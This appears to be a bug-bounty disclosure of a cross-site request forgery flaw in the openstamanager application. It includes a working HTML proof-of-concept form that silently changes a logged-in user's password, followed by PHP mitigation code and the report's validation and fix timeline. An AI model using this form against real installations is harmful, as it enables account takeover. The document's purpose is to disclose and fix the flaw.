Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager


Reported on

Jul 31st 2021

✍️ Description

An attacker can change a user's password if the user visits a site controlled by the attacker.

🕵️‍♂️ Proof of Concept

1. Open PoC.html in Firefox or Safari. You can check that the password has changed to admin0.

// PoC.html
// Cross-site form that auto-submits a self_update request to the vulnerable endpoint;
// the original file was missing the closing form tag.

<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/openstamanager/modules/utenti/info.php" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="op" value="self&#95;update" />
  <input type="hidden" name="password" value="admin0" />
  <input type="submit" value="Submit request" />
</form>

💥 Impact

This vulnerability allows an attacker to change the password of any user.


Set the SameSite attribute of cookies to Lax or Strict.
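The following is an added example of how the recommended mitigation looks in PHP, the language openstamanager is written in; it is not the project's own code or its fix. It combines the SameSite cookie attribute with a per-session CSRF token on the state-changing handler, because SameSite alone depends on browser support and on the cookie being set explicitly. All function names (csrf_token, csrf_check) and the use of a plain PHP session are assumptions for illustration.

```php
<?php
// Added example, not openstamanager code: anti-CSRF protection for a
// password-change handler. Assumes a plain PHP session; function names
// are hypothetical.

declare(strict_types=1);

// 1. Harden the session cookie before the session starts. With SameSite=Lax a
//    cross-site top-level POST (like the PoC form above) is sent WITHOUT the
//    session cookie, so the forged request arrives unauthenticated.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,   // only transmitted over HTTPS
    'httponly' => true,   // not readable from JavaScript
    'samesite' => 'Lax',  // 'Strict' is also acceptable here
]);
session_start();

// 2. One random token per session, embedded in the application's own forms.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// 3. Constant-time comparison of the submitted token with the session copy.
//    No type hint on $submitted: a malformed request may send an array.
function csrf_check($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== ''
        && is_string($submitted)
        && hash_equals($expected, $submitted);
}

// 4. The state-changing operation refuses any request without a valid token,
//    so a cross-site form that only knows "op" and "password" is rejected.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['op'] ?? '') === 'self_update') {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Only now apply the password change for the logged-in user.
}
```

The application's legitimate password form renders a hidden field named csrf_token whose value is htmlspecialchars(csrf_token()) from the same session; the attacker's page cannot read that value, so the check in step 4 fails for the forged request even on a browser that ignores SameSite.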


We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back a year ago


hey man, I just want to make sure you see this report too.

devcode-it/openstamanager maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 402dca a year ago
The fix bounty has been dropped